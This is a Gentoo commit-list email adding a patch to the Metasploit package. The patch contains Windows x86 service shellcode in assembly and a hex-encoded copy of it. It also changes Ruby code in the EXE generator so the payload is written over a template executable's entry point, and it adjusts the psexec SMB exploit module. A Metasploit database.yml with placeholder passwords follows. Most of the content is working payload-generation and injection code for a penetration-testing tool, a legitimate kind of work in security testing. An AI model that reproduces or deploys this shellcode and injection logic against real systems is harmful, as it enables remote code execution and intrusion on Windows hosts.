From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from lists.gentoo.org (pigeon.gentoo.org [208.92.234.80]) by finch.gentoo.org (Postfix) with ESMTP id 2C557138247 for ; Sun, 15 Dec 2013 17:19:12 +0000 (UTC) Received: from pigeon.gentoo.org (localhost [127.0.0.1]) by pigeon.gentoo.org (Postfix) with SMTP id 9EFF1E09F4; Sun, 15 Dec 2013 17:19:11 +0000 (UTC) Received: from smtp.gentoo.org (smtp.gentoo.org [140.211.166.183]) (using TLSv1 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by pigeon.gentoo.org (Postfix) with ESMTPS id 13531E09C6 for ; Sun, 15 Dec 2013 17:19:11 +0000 (UTC) Received: from flycatcher.gentoo.org (flycatcher.gentoo.org [81.93.255.6]) (using TLSv1 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by smtp.gentoo.org (Postfix) with ESMTPS id 100A333F36C for ; Sun, 15 Dec 2013 17:19:10 +0000 (UTC) Received: by flycatcher.gentoo.org (Postfix, from userid 2326) id AAA752004B; Sun, 15 Dec 2013 17:19:08 +0000 (UTC) From: "Richard Farina (zerochaos)" To: gentoo-commits@lists.gentoo.org Reply-To: gentoo-dev@lists.gentoo.org, zerochaos@gentoo.org Subject: [gentoo-commits] gentoo-x86 commit in net-analyzer/metasploit/files: agix_psexec_pull-2657.patch database.yml X-VCS-Repository: gentoo-x86 X-VCS-Files: agix_psexec_pull-2657.patch database.yml X-VCS-Directories: net-analyzer/metasploit/files X-VCS-Committer: zerochaos X-VCS-Committer-Name: Richard Farina Content-Type: text/plain; charset=utf8 Content-Transfer-Encoding: 8bit Message-Id: <20131215171908.AAA752004B@flycatcher.gentoo.org> Date: Sun, 15 Dec 2013 17:19:08 +0000 (UTC) Precedence: bulk List-Post: List-Help: List-Unsubscribe: List-Subscribe: List-Id: Gentoo Linux mail X-BeenThere: gentoo-commits@lists.gentoo.org X-Archives-Salt: 8027f35b-3787-4c98-9f9e-7412b3f307f6 X-Archives-Hash: 69d7584775e27452867e599fa8c81fb3 zerochaos 13/12/15 17:19:08 Added: agix_psexec_pull-2657.patch database.yml Log: importing new metasploit from pentoo overlay, major changes, enjoy the ride (Portage version: 2.2.7/cvs/Linux x86_64, signed Manifest commit with key DD11F94A) Revision Changes Path 1.1 net-analyzer/metasploit/files/agix_psexec_pull-2657.patch file : http://sources.gentoo.org/viewvc.cgi/gentoo-x86/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch?rev=1.1&view=markup plain: http://sources.gentoo.org/viewvc.cgi/gentoo-x86/net-analyzer/metasploit/files/agix_psexec_pull-2657.patch?rev=1.1&content-type=text/plain Index: agix_psexec_pull-2657.patch =================================================================== diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm --- metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm 1970-01-01 01:00:00.000000000 +0100 +++ metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm 2013-11-20 11:50:48.256366095 +0100 @@ -0,0 +1,64 @@ +;-----------------------------------------------------------------------------; +; Author: agix (florian.gaultier[at]gmail[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Size: 137 bytes +;-----------------------------------------------------------------------------; + +[BITS 32] +; Input: EBP must be the address of 'api_call'. + +push byte 0x0 +push 0x32336970 +push 0x61766461 +push esp +push 0x726774c +call ebp ;load advapi32.dll +push 0x00454349 +push 0x56524553 +mov ecx, esp ;ServiceTableEntry.SVCNAME +lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain +push 0x00000000 +push eax +push ecx +mov eax,esp +push 0x00000000 +push eax +push 0xCB72F7FA +call ebp ;call StartServiceCtrlDispatcherA(ServiceTableEntry) +push 0x00000000 +push 0x56A2B5F0 +call ebp ;call ExitProcess(0) +pop eax ;SvcCtrlHandler +pop eax +pop eax +pop eax +xor eax,eax +ret +cld ;SvcMain +call me +me: +pop ebp +sub ebp, 0xd6 ;ebp => hashFunction +push 0x00464349 +push 0x56524553 +mov ecx, esp ;SVCNAME +lea eax, [ebp+0xc9];SvcCtrlHandler +push 0x00000000 +push eax +push ecx +push 0x5244AA0B +call ebp ;RegisterServiceCtrlHandlerExA +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000000 +push 0x00000004 +push 0x00000010 +mov ecx, esp +push 0x00000000 +push ecx +push eax +push 0x7D3755C6 +call ebp ;SetServiceStatus RUNNING \ No newline at end of file diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm --- metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 1970-01-01 01:00:00.000000000 +0100 +++ metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm 2013-11-20 11:50:48.256366095 +0100 @@ -0,0 +1,17 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 +; Version: 1.0 (28 July 2009) +; Size: 189 bytes + strlen(libpath) + 1 +; Build: >build.py single_service_stuff +;-----------------------------------------------------------------------------; + +[BITS 32] +[ORG 0] + + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop ebp ; pop off the address of 'api_call' for calling later. +%include "./src/block/block_service.asm" \ No newline at end of file diff -Naur metasploit-9999.orig/lib/msf/util/exe.rb metasploit-9999/lib/msf/util/exe.rb --- metasploit-9999.orig/lib/msf/util/exe.rb 2013-11-20 11:50:31.748365346 +0100 +++ metasploit-9999/lib/msf/util/exe.rb 2013-11-20 11:50:48.256366095 +0100 @@ -402,36 +402,86 @@ case opts[:exe_type] when :service_exe + exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) max_length = 8192 name = opts[:servicename] - if name - bo = pe.index('SERVICENAME') - raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo - pe[bo, 11] = [name].pack('a11') + if not name + name = Rex::Text.rand_text_alpha(7) end - - if not opts[:sub_method] - pe[136, 4] = [rand(0x100000000)].pack('V') + #code_service could be encoded in the future + code_service = + "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" + + "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" + + "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" + + "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" + + "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" + + "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" + + "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" + + "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" + + "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5" + + pe_header_size=0x18 + section_size=0x28 + characteristics_offset=0x24 + virtualAddress_offset=0xc + sizeOfRawData_offset=0x10 + + sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size + sections_table_offset = exe.rva_to_file_offset(sections_table_rva) + sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset) + + sections_header = [] + exe._file_header.v['NumberOfSections'].times { |i| + sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]] + } + + #look for section with entry point + sections_header.each do |sec| + virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0] + sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0] + characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0] + if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData + #put this section writable + characteristics|=0x80000000 + newcharacteristics = [characteristics].pack('L') + pe[sec[0],newcharacteristics.length]=newcharacteristics + end end + + #put the shellcode at the entry point, overwriting template + pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code + when :dll max_length = 2048 when :exe_sub max_length = 4096 end - bo = pe.index('PAYLOAD:') - raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo + if opts[:exe_type] != :service_exe - if (code.length <= max_length) - pe[bo, code.length] = [code].pack("a*") - else - raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" - end + bo = pe.index('PAYLOAD:') + raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo - if opts[:exe_type] == :dll - mt = pe.index('MUTEX!!!') - pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt + if (code.length <= max_length) + pe[bo, code.length] = [code].pack("a*") + else + raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module" + end + + if opts[:exe_type] == :dll + mt = pe.index('MUTEX!!!') + pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt + end end return pe @@ -463,7 +513,7 @@ def self.to_win32pe_service(framework, code, opts={}) # Allow the user to specify their own service EXE template - set_template_default(opts, "template_x86_windows_svc.exe") + set_template_default(opts, "template_x86_windows.exe") opts[:exe_type] = :service_exe exe_sub_method(code,opts) end diff -Naur metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb metasploit-9999/modules/exploits/windows/smb/psexec.rb --- metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb 2013-11-20 11:50:31.988365357 +0100 +++ metasploit-9999/modules/exploits/windows/smb/psexec.rb 2013-11-20 11:50:48.256366095 +0100 @@ -153,7 +153,7 @@ # Disconnect from the ADMIN$ simple.disconnect("ADMIN$") else - servicename = rand_text_alpha(8) + servicename = rand_text_alpha(7) # Upload the shellcode to a file print_status("Uploading payload...") 1.1 net-analyzer/metasploit/files/database.yml file : http://sources.gentoo.org/viewvc.cgi/gentoo-x86/net-analyzer/metasploit/files/database.yml?rev=1.1&view=markup plain: http://sources.gentoo.org/viewvc.cgi/gentoo-x86/net-analyzer/metasploit/files/database.yml?rev=1.1&content-type=text/plain Index: database.yml =================================================================== # # The tests currently use the development user # https://dev.metasploit.com/redmine/issues/8418 # development: adapter: "postgresql" database: "msf_test_database" username: "msf_test_user" password: "secure" port: 5432 host: "localhost" pool: 256 timeout: 5 production: adapter: "postgresql" database: "msf_database" username: "msf_user" password: "secure" port: 5432 host: "localhost" pool: 256 timeout: 5 test: adapter: "postgresql" database: "msf_test_database" username: "msf_test_user" password: "secure" port: 5432 host: "localhost" pool: 256 timeout: 5